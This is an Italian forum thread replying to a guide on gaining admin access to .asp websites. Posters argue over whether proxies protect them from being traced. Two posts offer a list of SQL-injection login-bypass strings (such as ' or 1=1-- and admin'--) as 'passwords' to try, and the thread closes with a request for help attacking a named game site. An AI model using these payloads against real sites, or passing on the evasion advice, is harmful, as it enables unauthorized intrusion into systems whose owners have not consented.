• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Diventare Admin in un sito .asp

Riferimento: Diventare Admin in un sito .asp

ragazzi non so di quanto e vecchio sto topic,ma per il fatto delle multe nNON E VERO NIENTE!voi potete dire come non e vero? ricordate il mio topic di ieri sicuramente Mirko lo ricorda del fatto del sito .asp poi ci sono rientrato con un altro ip proxy e ho letto i codici con cui e stato creato il sito praticamente lui usa i cookie per identificare e riconoscere poi l'admin del sito e poi mette n'altra cosa di copia dell'ip certo e nostro ma da quanto ho capito non verra'segnalato a nessun centro sicurezza pur essendo commerce e per far mettere paura ma certo e sempre bene PROXARSI CHE NON SI SA MAI!!!

Puoi anche usare 1000 proxy, ma è SEMPRE possibile risalire al tuo IP.
 
Riferimento: Diventare Admin in un sito .asp

:emoji_relieved: walter4991 non me fa ridere perche o cambiato ip al pc e sono rientrato nel sito e l'ip diceva che ero in africa per parti di la quindi se entro con quell ip mandano la denuncia in africa? comunque si attraverso cookie una cosa del genere non lo dico solo io ma anche altri e comunque per il fatto del stare tranquillo :emoji_relieved: dico solo che le altre 20 persone che hanno provato questo sito le arrivata solo una pompa :emoji_relieved: :emoji_relieved: :emoji_relieved: :emoji_relieved: :emoji_relieved: e poi invece di parlare di non stare tranquillo ecc... leggi qua:
Perfavore, Entra oppure Registrati per vedere i Link!
 
Ultima modifica:
Riferimento: Diventare Admin in un sito .asp

Bene, sai che ti dico?
Spero proprio che ti arrivi una bella denuncia..
Bah.

Come già detto, possono risalire al tuo IP anche se usi 500 proxy, dato che il provider vede tutti i tuoi movimenti, cambi di IP, ecc...
Basta che loro contattano la polizia, e poi fanno tutto loro..
La polizia ha accesso ai dati dei provider. :emoji_slight_smile:
 
Riferimento: Diventare Admin in un sito .asp

:emoji_relieved: walter4991 non me fa ridere perche o cambiato ip al pc e sono rientrato nel sito e l'ip diceva che ero in africa per parti di la quindi se entro con quell ip mandano la denuncia in africa? comunque si attraverso cookie una cosa del genere non lo dico solo io ma anche altri e comunque per il fatto del stare tranquillo :emoji_relieved: dico solo che le altre 20 persone che hanno provato questo sito le arrivata solo una pompa :emoji_relieved: :emoji_relieved: :emoji_relieved: :emoji_relieved: :emoji_relieved: e poi invece di parlare di non stare tranquillo ecc... leggi qua:
Perfavore, Entra oppure Registrati per vedere i Link!
Lo spero anche io che ti arrivi una bella multa e se ti arriverà faccelo sapere così possiamo farci una bella risata... :emoji_relieved:
Ma te ti fidi di tutti in rete? Se entri nel sito della nasa e poi vai a chiedere in giro se puoi stare tranquillo e ti dicono di si te ci credi? :|
PS come già detto da mirko, la polizia può sempre risalire a te ci vuole un po di tempo ma ci si arriva, e in questo caso spero che ci arrivino... :emoji_relieved:
 
Riferimento: Diventare Admin in un sito .asp

walter4991 non augurare una cosa ad una persona perche dopo ritorna indietro sul fatto del sito della nasa lo sapevo pure io e poi non sarei tanto nabbo come te ad entrarci e nemmeno fare il ping delle porte o la scansione ma su questo cazzo di sito inglese non lo si poteva sapere no? e quanto rosichi?e ricorda ancora
NON AUGURARE UNA COSA AD UNA PERSONA PERCHE E UN GIRO PRIMO O POI GIRA E PENSA CHE TOCCHERA'PURE A TE ASD ASD

AAA N'ALTRA COSA TU AI DETTO CHE NON MI DEVO FIDARE IN RETE GIUSTO?ALLORA PERCHE DOVREI SENTIRE E FIDARMI DI TE? :emoji_relieved:
 
Ultima modifica:
Riferimento: Diventare Admin in un sito .asp

Ho provato e funziona..bella guida complimenti ^^
Non ho toccato niente, era solo per testare.. :sospiro:
 
Riferimento: Diventare Admin in un sito .asp

Come si dice...Devi saperti anonimare:emoji_slight_smile:
se ti anonimi non avrai rischi
 
Riferimento: Diventare Admin in un sito .asp

Non ho provato a farlo e non ci tengo a farlo.
Comunque bella guida,complimenti!
P.S comunque non serve a niente se poi non puoi fare quello che ti pare..nessuno si vuole prendere una bella multa.
^^
 
Riferimento: Diventare Admin in un sito .asp

Basta Proxarsi e stai tranquillo.
P.S:Tranquillo i prox sono gratis!
 
Riferimento: Diventare Admin in un sito .asp

Dato che la discussione è stata riaperta vorrei consigliare ai ragazzi anche queste password, anche se quella che ha consigliato Inferno è la più probabile:
’ or 1=1–
1'or'1'='1
0'or'0'='0
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
’ or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
 
Riferimento: Diventare Admin in un sito .asp

Dato che la discussione è stata riaperta vorrei consigliare ai ragazzi anche queste password, anche se quella che ha consigliato Inferno è la più probabile:

Se non sbaglio quelli di "base"
Ovvero: Username : admin
Password : 'or''='
Funzionano sempre al sito che ha la vulnerabilità.
Comunque la guida in se stesso è semplice, molti si definiscono Hacker perchè inseriscono questi dati e sono dentro. :soso:
 
Riferimento: Diventare Admin in un sito .asp

Non funziona nulla se fai cosi solo se danneggi il sito
 
Riferimento: Diventare Admin in un sito .asp

ragazzi mica sapete come si bugga il sito di point blank italia ??
chi lo saprebbe fare mi contatti su SKYPE: federico.matrix graziee